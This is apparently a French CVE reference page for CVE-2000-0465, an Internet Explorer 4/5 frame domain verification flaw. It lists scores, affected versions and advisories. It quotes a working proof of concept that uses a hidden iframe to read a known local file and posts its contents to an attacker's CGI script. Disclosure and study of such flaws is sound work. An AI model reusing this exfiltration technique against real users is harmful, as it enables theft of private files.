CVE-2000-0465 : Détail

CVE-2000-0465

63.25%V3
Network
2000-07-12
02h00 +00:00
2016-10-06
15h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Internet Explorer 4.x and 5.x does not properly verify the domain of a frame within a browser window, which allows a remote attacker to read client files via the frame, aka the "Frame Domain Verification" vulnerability.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19939

Date de publication : 2000-05-16 22h00 +00:00
Auteur : Andrew Nosenko
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/1224/info The DocumentComplete() function in IE does not properly validate origin domains. Therefore it is possible for a remote webserver to gain read access to local files on the machine of any website visitor or email recipient by accessing the browser object of a frame containing local content. Only files that can be opened by a browser window (eg. *.htm, *.js, *.txt etc) are viewable, and the path and name of the file must be known by the attacker. Update (May 16, 2001): A new variant of this vulnerability has been discovered. Microsoft has released a new patch to address all known variants of this vulnerability. <iframe id=clientContent width=0 height=0 noborder> </iframe> <script for=clientContent event="DocumentComplete(browser)"> alert (browser.document.body.innerText); // browser is an instance of the IWebBrowser COM object document.forms[0].elements[0].value = browser.document.body.innerText; document.forms[0].submit (); </script> <script> clientContent.navigate("c:\\known_file.txt") </script> <form action="/cgi/malicious-script.cgi" method=post onSubmit="window.alert(document.forms[0].elements[0].value); return true"> <input name="file_text" type=hidden> </form>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 4.0

Microsoft>>Internet_explorer >> Version 5.0

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 5.5

Références

http://www.microsoft.com/technet/support/kb.asp?ID=251108
Tags : vendor-advisory, x_refsource_MSKB
http://www.securityfocus.com/bid/1224
Tags : vdb-entry, x_refsource_BID
http://www.microsoft.com/technet/support/kb.asp?ID=255676
Tags : vendor-advisory, x_refsource_MSKB